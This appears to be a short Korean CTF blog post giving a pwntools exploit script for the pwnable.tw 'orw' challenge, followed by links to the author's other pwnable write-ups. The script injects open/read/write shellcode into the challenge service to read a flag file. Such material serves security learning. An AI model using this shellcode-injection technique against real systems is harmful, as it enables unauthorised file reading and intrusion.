pwnable.tw - orw
2021. 8. 31. 17:44ㆍPwnable
쉘코딩 하면 덴다.
from pwn import *
r = remote("chall.pwnable.tw", 10001)
e = ELF("orw")
context.log_level = "debug"
context(arch='i386', os='linux')
pay = ""
pay += asm(shellcraft.open('/home/orw/flag'))
pay += asm(shellcraft.read('eax', e.bss()+0x100, 100))
pay += asm(shellcraft.write(1, e.bss()+0x100, 100))
r.recv()
r.sendline(pay)
r.interactive()'Pwnable' 카테고리의 다른 글
| dreamhack.io - tcache_dup2 (0) | 2021.09.03 |
|---|---|
| dreamhack.io - cpp_string (0) | 2021.09.01 |
| dreamhack.io - cpp_type_confusion (0) | 2021.08.25 |
| dreamhack.io - cpp_container_1 (0) | 2021.08.12 |
| HackCTF - Unexploitable #3 (0) | 2021.08.10 |